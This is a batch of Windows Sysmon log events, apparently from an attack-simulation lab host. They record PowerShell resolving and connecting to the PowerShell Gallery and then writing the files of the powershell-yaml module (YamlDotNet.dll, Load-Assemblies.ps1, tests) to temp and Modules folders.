{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4712,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:02.518\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50166\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:02.518","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50166","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4713,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:04.314\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 07:59:04.314","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:04.314","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 07:59:04.314","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4714,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:04.314\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 07:59:04.314","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:04.314","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 07:59:04.314","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4715,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.314\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.314","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.314","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.314","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4716,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.330\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.330","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.330","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.330","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4717,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.330\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.330","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.330","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\y4ep3j3i\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.330","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4718,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:04.346\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 07:59:04.346","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:04.346","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 07:59:04.346","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4719,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.346\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.346","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.346","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.346","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4720,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.346\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.346","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.346","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.346","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4721,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.346\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.346","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.346","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.346","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4722,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:04.361\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 07:59:04.361","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:04.361","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1894400453\\powershell-yaml\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 07:59:04.361","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4723,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:01.619\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nQueryName: www.powershellgallery.com\r\nQueryStatus: 0\r\nQueryResults: type:  5 powershellgallerytrafficmanager.trafficmanager.net;type:  5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:59:01.619","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","QueryName":"www.powershellgallery.com","QueryStatus":"0","QueryResults":"type:  5 powershellgallerytrafficmanager.trafficmanager.net;type:  5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4724,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.830","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.830","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4725,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.830","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.830","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4726,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:04.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 07:59:04.830","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:04.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 07:59:04.830","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4727,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:04.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 07:59:04.830","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:04.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 07:59:04.830","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4728,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:04.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 07:59:04.830","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:04.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.2\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 07:59:04.830","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4729,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:02.818\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50167\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:02.818","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50167","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
